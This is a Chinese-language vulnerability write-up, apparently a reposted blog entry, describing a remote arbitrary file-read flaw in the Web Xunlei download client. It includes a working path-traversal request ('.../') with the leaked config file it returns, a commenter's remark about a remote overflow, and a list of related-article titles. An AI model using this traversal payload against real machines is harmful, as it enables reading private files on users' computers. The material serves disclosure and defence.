Web迅雷远程任意文件读取漏洞
漏洞详情
简要描述:
web迅雷在设计上和实现上存在问题,导致恶意***者可以读取安装有web迅雷的用户机器上的任意文件
详细说明:
web迅雷在本机存在有一webserver,并且绑定在0.0.0.0上,同时对于web请求处理并不恰当,存在安全缺陷导致恶意***者可以构造请求读取用户机器上的任意文件。
对于../跳目录的情况有处理,但是对于.../却可以绕过(某大师牛逼的分析思路,用file mon黑盒分析,赞!)
漏洞证明:
GET /.../Profiles/UserConfig.ini HTTP/1.1
HTTP/1.0 200 OK
Server: Xunlei Http Server/1.0Date: Tue, 23 Nov 2010 09:02:07 GMT
Content-type: *Content-length: 407Last-Modified: Tue, 23 Nov 2010 08:43:15 GMT[Skin]CurrSkin=default.rar
SkinNames=default.rar
[Monitor]ExtendNames=.asf;.avi;.exe;.iso;.mp3;.mpeg;.mpg;.mpga;.ra;.rar;.rm;.rmvb;.tar;.w
ma;.wmp;.wmv;.zip;.torrent;FilterSitesMax=20[EMuleGenericSettings]EMuleWatchLink=1[Update]RunUpdate=0[General]TaskShowPerPage=11[Antivirus]Protect=0FilePath=Parameter=[BHOSection]StatsDay=2[SavePath]SetFolderIcon=1Path=C:\Xunlei\
发送 43, r接受 579: 无sock
C:\Documents and Settings\Administrator>
站长评论:
这个很早就有了,不光是Web迅雷存在此问题,历代迅雷客户端都存在此问题,还可以远程溢出,原因是迅雷为了p2p传输,在本地开了一个80端口,用于传输p2p数据,然后你懂了……
很早之前,就在路由上屏蔽了对外80端口,该问题比较危险
转载于:https://blog.51cto.com/hellxman/744042
Web迅雷远程任意文件读取漏洞相关推荐
- 小米路由器http文件服务器,小米路由器远程任意文件读取漏洞(CVE-2019-18371)
## 远程任意文件读取漏洞(CVE-2019-18371) #### 小米路由器的nginx配置文件错误,导致目录穿越漏洞,实现任意文件读取(无需登录) nginx配置不当可导致目录穿越漏洞, ``` ...
- CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)
CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452) 一.漏洞描述: Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Fir ...
- CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)
漏洞描述 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在 ...
- Web漏洞-任意文件读取漏洞
任意文件读取漏洞 原理 任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取的文件没有经过 ...
- 任意文件读取漏洞知识梳理
文章目录 1.概述 2.开发语言触发点 2.1 PHP 2.2 Python 2.3 Java 2.4 Ruby 2.5 Node 3.中间件/服务器相关触发点 3.1 Nginx错误配置 3.2 数 ...
- 《从0到1:CTFer成长之路》1.3 任意文件读取漏洞
文章目录 1.3.1 文件读取漏洞常见触发点 1.3.1.1 web语言 1. PHP 2.python 3.Java 4.Ruby 5.Node 1.3.1.2 中间件.服务件相关 1.Nginx错 ...
- 安全研究 | Jenkins 任意文件读取漏洞分析
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...
- gitlab 更新文件_GitLab任意文件读取漏洞公告
2020年4月28日,GitLab的一个任意文件读取漏洞的漏洞细节被公开.该漏洞补丁于2020年3月26号由GitLab官方发布.深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告. 漏洞 ...
- Grafana 中存在严重的未授权任意文件读取漏洞,已遭利用
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...
最新文章
- 直接对梯度下手,阿里达摩院提出新型优化方法,一行代码即可替换现有优化器...
- Linux内核之内核同步(三)——自旋锁
- 5.1 计算机网络之传输层(传输层提供的服务及功能概述、端口、套接字--Socket、无连接UDP和面向连接TCP服务)
- 一般控制矩阵转能观标准型
- 数组输出黑科技----fwrite()
- 西瓜显示服务器错误,西瓜云服务器
- C语言给出任意4个数算24点,讨论24点算法。
- html中js设置密码长度,JS判断邮箱格式,密码输入是否一致,不能为空,长度控制等...
- VMware中的三种网络模式-----Host-only模式
- go - range
- docker 1.8+之后ubuntu安装指定版本docker-engine
- Google Code Review 处理代码审查中的推回
- jmeter下载地址
- [原创]浅析汇编之堆栈平衡
- 传奇手游漏洞获取gm权限_传奇私服漏洞获取gm权限
- MTK logo.bin手动制作(个人博客:浏览器直接输入wugn.tech)
- 视频直播时连麦功能使用说明
- 用了五年 VS Code ,我决定换成 JetBrains…
- 黑白图片复原为彩色Picture Colorizer(图片着色器)
- 网络安全学习笔记(2)